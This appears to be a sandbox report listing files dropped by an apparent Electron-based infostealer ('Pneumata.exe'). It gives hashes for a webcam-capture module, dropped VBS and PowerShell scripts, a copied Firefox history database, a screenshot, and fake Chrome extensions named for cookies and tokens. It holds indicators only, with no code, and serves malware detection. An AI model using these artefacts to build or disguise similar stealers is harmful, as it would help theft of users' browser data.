SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\app.asar

MD5 d7d0f994fff040c777173a0a82117699
SHA1 ba7191adb885a7381e618539114cea69cfb8edd9
SHA256 7889f11baa185412d648ad6e389ea20549c635db60534170fdb27ee89d00aaa6
SHA512 99c1be4c5a0760a95246dc583c874bedc1b5e3bc5b907cb56355f1307438b2aede97c689c7f48b7938d8b57c7bf87d4bb597cdfabc3d593e6e04ffb033112ebd

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 1291fa2a522d9821239b32dc184a48e6
SHA1 19f17e0edca633dcb19cbd3c689b90e0a6adf386
SHA256 8243265bebed153a174a326ed546309a2a5cc899a17f32b4016b3cc876a04e2f
SHA512 6551780f603266152c11224575662c826c829961f8ec1401bb184d1e3adcbc4bc4239309ae7a738afe327587faace5437cd4848a645b52b7ce464549ee5fa8d7

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 7e58ecdda6b72d137d99c19cb515835a
SHA1 8225c20e3d9c4a75339cad655645a21a0c051c62
SHA256 5d5a47f51323bc0815c2987c8c9dc484a6d0e85bdcea6dbd1a806e969d24923f
SHA512 f53bc1e40d6600fcc16c97e1423d24602892f660f10a83498df0b73c8e1f620b4e6ba44a9a56b6afe953528b19de2961e2c5c332db652d358b62d9a15a02b276

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 467860525f6fddc1d273b0aa9471ab3e
SHA1 c81a830b638e7b106b1b452199a896a35fcb3133
SHA256 233980b58b584363429a76e8b803870e6f3254967c8d0e01a96595362b927ecc
SHA512 4a9d2b89ed31bb9a9d65a96e8de49e71cfd6a5fde2e133b1ae517470a2416d4cfce7e97bb0a71d7cfe8878e8c3fa1cd0a4b144c60df76667744d2e9d21a826c8

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 59def2e561d91af57332b64321681f7f
SHA1 a197e05aee11ad0465485b9907d0f2ae012880ae
SHA256 b651ae2b0c8466ccafb0dd14e1dfb0d029c1ef6af048445deaa145015256ce8e
SHA512 5c1a7f9d56edd1b15f7f0ab46a55df3cdb50c13bed28a78193cc4a71373231ca1a45fa714d0a40d8f804fbc31b64eb7e2299438fbed9767c9000a2ec472b6f1b

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\v8_context_snapshot.bin

MD5 bb6deb6290843b33a649b0cfea8fcf71
SHA1 28ad95413390bdd23552d1dfd4d76a50282e7572
SHA256 1497bc0ce6bea8938eb66a76ebc40154deac8df65a1aa07b1438d5de4d0faaa4
SHA512 ff588026b82ce8b297e018afe46be9b707f8aab8e45346318007fcef9e3bf09834edcc020e6aeef6640495701842f0fa0713eb5a8896521b025c291010064789

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\icudtl.dat

MD5 6e19687e92a1925e52cf3177c57004b1
SHA1 ed5f828dded1329f724177e3b916b8519d27b325
SHA256 4847bdb2296b9a3ede3939bc3a3aa106dcdd504f9deef702c4f120554fba6836
SHA512 3533e44bba9d3d10abca46d17c91026832fc1c2cfc3f71f74e914d7ef28e695781ccfacae359d0745d9ba6e27dd57844a24c3082f6176b07a14f8ee8b195b6b9

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources\app.asar

MD5 018eb886cf929fdae5bf92470a066ead
SHA1 fed796cfda6f170ffd956454d3af6fb91ecb680d
SHA256 006868469bc29fdf74163fa9f0daa4a6e43e54e7636dbe79d9dda63624557484
SHA512 7064932558623028997e3d51bcb326e71861b9ab7d83fa087649f3eadbd3b780a49727479899eff6dc47e512a3b7db32f45f6b42d6ddd6837baeb459055e6120

C:\Users\Admin\AppData\Local\Temp\0fc9bab2-80f9-46d9-a15e-1db1c51c8780.tmp.node

MD5 cdf878f96602a89c7889b400e50a8ce7
SHA1 a6014006962a33f71f774173992ece1e690625de
SHA256 06483b2647873f458dbf5e878fffcb4328719fdd20e24d1cc2d68c8ae8398e6b
SHA512 0315a5df9d66c26185947a1c56db65db200530798ab8f1fce0688322e49904004afea366af1fa12a8e2a0c5a1be0c83bb00d03906fac3a1b5fd6b587fa66be88

C:\Users\Admin\AppData\Local\Temp\2425b0ea-ad2e-4ddf-8071-224cc0f80d0d.tmp.node

MD5 b2c8a1c734df7e8d861d4180ff1b60d3
SHA1 bf2f81da7e9375d10fa248454fec4f5d6277dbeb
SHA256 4cffaa4b775b41d4f7941d20c1c1f7f53acbc0a528a070b98bc301898390c62b
SHA512 1ab7c2076df04ddd2cf62e28990172884be49b56fccbe7c4a26fc5a374620b5ccd3e447ad2cc6b3b53dba4f0aeec228dd461e8327996e703479956676c3daca9

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources.pak

MD5 e4a369ae91217049a52165073c58d02f
SHA1 671df268aeac9c7bf436f08bcdd1afd6358c0954
SHA256 308b2d7c7169e4ce79e483b5b655acfab81e56199b780452bfad263061d8e2e1
SHA512 e87cef6eb8b70d1b9769affc86e317e613888402737c95dcd85e5c485416c045c07f8c9e1b045768109d520d87e314c465e8d6cb0a797de703c00cce8f9bc8fc

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 1b65ec9ae7de354f7c649a07c6363853
SHA1 0bda9991f2ca8edff753a61ac9f523704361e603
SHA256 c05161774f1e3d03ebe2d41346da9e188e6bb7e0f38ead56e880cb1c8818b261
SHA512 614a564440d4073a61866b095a7ea02dc40eaf6d620afec89390e1e956193892c51f362d40b68d56852d8721df3826f8242a729f0b724c04565808d710d088bf

memory/4304-578-0x00007FF934D60000-0x00007FF934D61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 f3ec86aca5fcfd38d7b6b4d021be3528
SHA1 ffa92f743313d299b3d4e03456fe3f5f79fe70df
SHA256 859043fe72afde8ce9ebb90b3827766aea15da646fcc024a223c455126db99f0
SHA512 5a9f5936ad2fa7547e7870b1bb9d7e299bcd78949d1aef5c26daf29ce951e6f1ead49886cf1639d0716d8c6e4fdc92467e8eca020482c8487482478d984f44c7

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\D3DCompiler_47.dll

MD5 22cbe8a45ca2467e6cec39c4d508d6ef
SHA1 d8174481457559cded58de0d68cf6e44c51817c5
SHA256 9b6b7a9d6107b2d2e5707cdb3bc65bbe5217e8ef6a143fd9892134c4f8a6e824
SHA512 1e4028f19c870a23807d1b9d74ef19c905588a4e07c6460c092f39ee7b7115477ff6d5e24b06aa5afb163fee03fd5da1586980e29299fcfd13c261a4e9b93da9

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\libEGL.dll

MD5 038c846513e6dff1378bd60b579423f3
SHA1 ab1463d7c932e940d594b9d11a9525c91574a7a9
SHA256 98041dc86891f4d4a35be34953f9ecdad51b8ef21b0f6bdc4a7a5526b7d68ad4
SHA512 0664dd4dd75cf3699422e30fbd6cb12bc6229fdae0dc546e935564361bff718069fda176fa9441e3cf139919afbd9aaa0aa74b503406da4b5084ce8f8c718ff4

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\libegl.dll

MD5 4e0c0854dee04b75c09b883f8588dca3
SHA1 0c9ee9edf5eee19a91a9c4f5b9c48f39aa0bce66
SHA256 184ed45d4d2e1959f6b9a6886e1ebc984f54be82c789d225b0823416560cec47
SHA512 c335e8f7f3e8eff62b59765b73a34b0b44a051d3cd7ae45e3aab0bc0a87f24cea173f82958240a01627aab48aaae8ff4d991b7f8a327ae3a99938a622aa2c1a9

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\libGLESv2.dll

MD5 e72a921cfc0e38443777e98c1825d2e2
SHA1 533ab982da5327345f4ca97e9073270c4c8cefa7
SHA256 4ba4ea8a2bb03e4a4c67bd4945936659a2a4f0225eaf4b30aa19c2e46c2c9375
SHA512 88da757486fbe4fbfdd755c6ffc6ea5ac1afdd69f91e5e9fa01fa1d51d03393adbf044d4f94ff423d0e6f502b51a8149cb06806c8b735e79ad47541e3ed5b67f

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\libglesv2.dll

MD5 0374ada965b1aefebb89fe54ff011f23
SHA1 3f6d667abb236d27ed1591fddc5a990b4d048745
SHA256 b5e9a7d864b43e348371312c91ba15f216bc1ccbefabbac5727ddb6499643613
SHA512 c348222beea28c0914a05b0112ac15caaac8c0984827304a7b45dd9582495db6c30b721c5c75eb8595bd15c8eb75972dd474a424423391295ef0e2295a708d46

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\d3dcompiler_47.dll

MD5 61d5e2ac482d9615b5b3ffa341c37467
SHA1 8d0a6b4313205306c427d15801cf72e1d7a5159b
SHA256 de8c1b051ee70a5ed8ae61861c313f822f52e6dadddc0dd71dc2cb86c8fc5b2f
SHA512 1d43b2290f8b15eb0a86bdf4d6d11d7dfce255772814dbd6f5685815966e51f82e20c49ca2c2f83b8397fdc225cdb8957653f1cd68fefd6446b6b0850fb98d76

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 2d7cdbaf42463f144e82f0386e7e0392
SHA1 e99bb1ed94e79f384c3fe00bc2eb71f1e21092de
SHA256 f1d5847c699523d9dd77f780e0ca241c7ed63c555680259b6c79b78e25fb5891
SHA512 d4402dce195c400417b314cc522987b493dbe98a395491dd9bcb321007bc821458481951b1bce074963e4a1e7381b367fa6991e740e4dabe4c33b53566f8cbca

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 25f87a50222fc67ca809acb65af328e9
SHA1 5345e7f0cb8624980c9c84564861089f58c8a8ac
SHA256 40c3de84f3f06230425fc4254f74ca036b031cf2c9334638427b26e9a66acf20
SHA512 f92bd7ede9755b69ef38d2eead2a373524f77f7a5ec1c571b6293ff85207f0fcf59d8e0e0445a46f32574adac0feb5f16f0808e67106d6d851798501eb7ad9b1

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 3f32e3e8d795f6399f7a406dd27f37a4
SHA1 54a896615ab7f0a73e1ba2d2b53cd81ae102d15d
SHA256 cc5bd89eb8502eed4ca788dd896c8ce26c40eddcdc3860f12001b3d189e79c59
SHA512 d06f4da97dd70e06240de25da90d21e73d227eb332fb0a569e0c82c959b1f25603238e7fac5d8169d6288b4cd2759b18e8094d0431b91524e50cac8ad5464c8a

memory/4780-606-0x0000013248850000-0x0000013248872000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qtueangs.v3a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4780-614-0x00000132487A0000-0x00000132487B0000-memory.dmp

memory/4780-613-0x00000132487A0000-0x00000132487B0000-memory.dmp

memory/4780-612-0x00000132487A0000-0x00000132487B0000-memory.dmp

memory/4780-611-0x00007FF914600000-0x00007FF9150C1000-memory.dmp

memory/4780-618-0x00007FF914600000-0x00007FF9150C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/3608-633-0x0000017FD25F0000-0x0000017FD2600000-memory.dmp

memory/3608-634-0x0000017FD25F0000-0x0000017FD2600000-memory.dmp

memory/3608-632-0x0000017FD25F0000-0x0000017FD2600000-memory.dmp

memory/3608-631-0x00007FF914600000-0x00007FF9150C1000-memory.dmp

memory/3608-637-0x00007FF914600000-0x00007FF9150C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/880-652-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/880-655-0x0000026184550000-0x0000026184560000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Pneumata.exe

MD5 9bee0b53929708850aaed0ee185821f5
SHA1 1d5d368d1e68fcfaff88230ec22a56016abb868e
SHA256 794ea56503c7d368bbde22d0ea96be37f2c26a7a33aa389b6ddc681b33e0d4c0
SHA512 c87b1e58bcc6954dd3eb37033625975838ddaa49ff38d97fb70b70d5781c34d6f06351b45b79eb51ea16e7c47fb29f3c7034b5da2aefca9cc0630d976f3de325

memory/880-656-0x0000026184550000-0x0000026184560000-memory.dmp

memory/880-659-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\HHbiOVOfXmnL.vbs

MD5 abc133bf2a55d11645e0592b2e9c8824
SHA1 ca9eb17c7773d28c5c9b888dc775143b2402251b
SHA256 f83424a36ca41de65f285ea6b633f6be9bb7ec36e24a5190a98a612861699f42
SHA512 c15a7278b88e9e5683df32cb1e01ec4696a01acb18e3c485d133ae040ed4665dc1f7e3f813012808daa1c745bc8324559ccf87055c6be01e892b744d9d0f27e8

memory/4304-672-0x0000024A53740000-0x0000024A53A95000-memory.dmp

memory/880-654-0x0000026184550000-0x0000026184560000-memory.dmp

memory/6544-759-0x000001DC0F030000-0x000001DC0F040000-memory.dmp

memory/6544-758-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6020-763-0x00000209D5E20000-0x00000209D5E30000-memory.dmp

memory/6544-762-0x000001DC0F030000-0x000001DC0F040000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fcc33765733969e9bd098e57ebce3255
SHA1 783cc0ed404161ae9cbebfe1a68e77d60af07994
SHA256 90d0bac2211fa1f7c418a5355a1df771fa2afc106b31543fa9cd881351fc2354
SHA512 6712d86e133b3779777110afca51a12afbf26a116124a21e631f509e9b71d4865b590d1685aa13237b36ac3ee3d6860c8731b158270d3395cb0b4b7c112497cc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NHOKRHY5814U0LA7X8WE.temp

MD5 1cddd30f32651f67bfe4a73e61699fbd
SHA1 144c806714938237e01ace6d318acc83df390616
SHA256 7fc5350e94771922f48f6cac1aed6d8805328aa7a0f0a529495ecf7cce099411
SHA512 28fd2b76de160bfa6da60e627936d1b7defb1bbe121ebfd0823137c72605e8ad9005e4f8751f1515008593a19009163b7fec73a2f249232dc2fd3f5276fb2f73

memory/6020-797-0x00000209D5E20000-0x00000209D5E30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6210fa9b0b55e1cad3d7f8de0167957e
SHA1 db15138381b09173479b02274188cad0ae746671
SHA256 1782890d1fd6fe2432aa581ed7fa4843618f014ade5892368a2857a286517f42
SHA512 16ff6b0eb9be913273c475dcb1888ce9ceeb181a01b446d84bb52d172d82313fe47777ecbe54ac58a4e916c40f0454e522957186b2a3cb3511d277b9eea15e45

memory/8036-798-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6544-808-0x000001DC0F030000-0x000001DC0F040000-memory.dmp

memory/5372-809-0x000002B0B0000000-0x000002B0B0010000-memory.dmp

memory/8036-821-0x000002103F6A0000-0x000002103F6B0000-memory.dmp

memory/8036-810-0x000002103F6A0000-0x000002103F6B0000-memory.dmp

memory/5372-831-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CuLes3pYjWqr_temp.ps1

MD5 79a370d4d07306b3c9c609e9ab450571
SHA1 0822a815e4cf64881021b848a58895d5ab3949aa
SHA256 1b0d083776ceabe79729a46c7b34ca8f92dfcb20721b71b5de9b0651e251c815
SHA512 fb2f1b8e57353c82595690ebb3ad1c5553153e30d76c9466c6c1d6d4a5489001173e930a65858c0aa4483693bc4fc627129046df123c3c5723bfcc01227eb467

memory/6920-832-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6020-761-0x00000209D5E20000-0x00000209D5E30000-memory.dmp

memory/8036-833-0x000002103F6A0000-0x000002103F6B0000-memory.dmp

memory/6020-760-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6920-834-0x000001C2F2B10000-0x000001C2F2B20000-memory.dmp

memory/6544-838-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6336-849-0x000001A0224C0000-0x000001A0224D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d460ce715a00afd56cda62e926b8b17
SHA1 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA512 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

memory/6336-848-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6020-852-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6020-853-0x00000209D5E20000-0x00000209D5E30000-memory.dmp

memory/8036-855-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6336-862-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6288-865-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/5372-870-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/8036-866-0x000002103F6A0000-0x000002103F6B0000-memory.dmp

memory/8036-880-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

memory/6020-858-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/6920-854-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p6p4nphm.default-release\places.sqlite_tmp

MD5 c45ae8ab7c8a9fb1fa6c7ed84be226c3
SHA1 2b05c7e0ea005dd2bff4b7e47f97729318e4a790
SHA256 be2df387cceccdefa5a918a76a0a35938a570d134578537305d71dfb058f33ad
SHA512 74f9c23ca06280a980599f6650e67d4b4183c023740ed83eed702a1d8fad4298d5db9eede9ee04261ccbffae80eb67d7e8d249598ea6e82f834943ba070e5a1d

memory/6288-883-0x00007FF914720000-0x00007FF9151E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mrfjAliugCUQKkh5baSi\System\IMXSDNYJ - 2023-12-17_002606.png

MD5 7f2fbdfefb58d36de15099fb10ce7b1c
SHA1 7ee48ec5c8ad95db82db1180bce78fd2de2aa17f
SHA256 767b2d3e5e3ad773a1bccdda011b33f533feefe0c13c774706ae3582ba893795
SHA512 27439abd458f5345b5a946fdb4c887a5010f4523cf42aa9e90f28029d1dfd89f1294d5822d5595c460784f1aab77a93bd466c421e42bc01ee30a39982998ffd5

memory/6816-956-0x000001DB75610000-0x000001DB75620000-memory.dmp

memory/6816-955-0x000001DB75610000-0x000001DB75620000-memory.dmp

memory/6816-954-0x00007FF914330000-0x00007FF914DF1000-memory.dmp

memory/6816-959-0x00007FF914330000-0x00007FF914DF1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs

MD5 2c7b97d45179126c0832f994df68cf77
SHA1 df31514766a9151cd8631ccfe07d716362f52126
SHA256 491165452b855c0d53f6407cbc34dfad37eb0b0efa3313665cba1ccffbe6ff28
SHA512 ac61e57095cd79c6fd46d07f812c44713da7e770eb62b9819da61203f25a7db9a449220111f3b1723557382d78407a110214f994b6649e885ae92ed4698b5df9

memory/5620-1004-0x0000023B3FAB0000-0x0000023B3FAC0000-memory.dmp

C:\Users\Admin\AppData\Roaming\salutKWb3k.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/5620-1005-0x0000023B3FAB0000-0x0000023B3FAC0000-memory.dmp

memory/5620-1003-0x00007FF914330000-0x00007FF914DF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b031b4cc1134e4091319363b866ed5f
SHA1 acb0c9e0b597c339d26fc2d0bbd576b6a1bdde4a
SHA256 298d9b495f2286bc913b9acb5a5a499f2ee3519af7ab0b6d994e7536a6b20e26
SHA512 59b5fecf3da7969fcaab2fc0a32eaa40ffb25e2ae0fc30ed79d85f12d4a069344ffc92279c0a2ea43c747fd47f60da8a58b4823da64b843979c64e2cfeadc7f6

memory/5620-1009-0x00007FF914330000-0x00007FF914DF1000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2cfd3dd20571cce21f09407b28b565fb
SHA1 07a7704986e963e9ba69f7109b7450deccd23eb2
SHA256 c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792
SHA512 bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
